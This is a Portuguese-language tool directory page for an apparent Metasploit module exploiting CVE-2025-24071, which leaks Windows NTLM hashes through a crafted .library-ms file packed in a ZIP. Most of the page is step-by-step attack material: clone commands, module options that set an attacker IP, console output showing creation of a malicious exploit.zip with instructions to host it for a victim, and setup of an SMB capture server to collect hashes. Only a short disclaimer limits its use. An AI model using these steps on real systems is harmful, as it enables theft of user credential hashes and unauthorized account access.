Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Blackash-CVE-2025-24071 — CVE-2025-24071 | Kitploit
Ferramentas/GitHubGitHub/zbs54/blackash-cve-2025-24071
Frameworks de ExploraçãoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesTestes de Penetração
GitHubzbs54/blackash-cve-2025-24071

Blackash-CVE-2025-24071

CVE-2025-24071

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Blackash-CVE-2025-24071

CVE-2025-24071: Vazamento de Hash NTLM via Arquivo .library-ms, Módulo do Metasploit 🚨

Descrição

A exposição de informações confidenciais a um agente não autorizado no Windows File Explorer permite que um atacante não autorizado realize falsificação (spoofing) através de uma rede.

Métricas

CNA: Microsoft Corporation Pontuação Base: 6.5 MÉDIO 🟠 Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Visão Geral

A vulnerabilidade ocorre quando um usuário extrai um arquivo ZIP contendo um arquivo .library-ms especialmente criado. O Windows Explorer inicia automaticamente uma solicitação de autenticação SMB para um servidor remoto especificado no arquivo, vazando o hash NTLM do usuário sem qualquer interação do usuário.

Este módulo do Metasploit:

  1. Gera um arquivo .library-ms malicioso.
  2. Empacota-o em um arquivo ZIP.
  3. Integra-se com a funcionalidade de captura SMB do Metasploit para coletar hashes NTLM.
root@kitploit:~
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed

Instalação:

  1. Clone o repositório:
root@kitploit:~
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071

Uso:

  1. Carregue o módulo:
root@kitploit:~
use auxiliary/server/ntlm_hash_leak
  1. Defina as opções necessárias:
root@kitploit:~
set ATTACKER_IP 192.168.1.162           # Replace with your IP address
set FILENAME exploit.zip                # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms   # Name of the .library-ms file
set SHARE_NAME shared                   # SMB share name
  1. Execute o módulo:
root@kitploit:~
run
  1. O módulo gerará um arquivo ZIP malicioso (exploit.zip). Hospede este arquivo para a vítima baixar e extrair.
  2. Use o módulo de captura SMB do Metasploit para coletar hashes NTLM:
root@kitploit:~
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
run

Aviso Legal ⚠️

Apenas para fins educacionais e de pesquisa. Use apenas contra sistemas que você possui ou tem permissão para testar.

Baixar ferramenta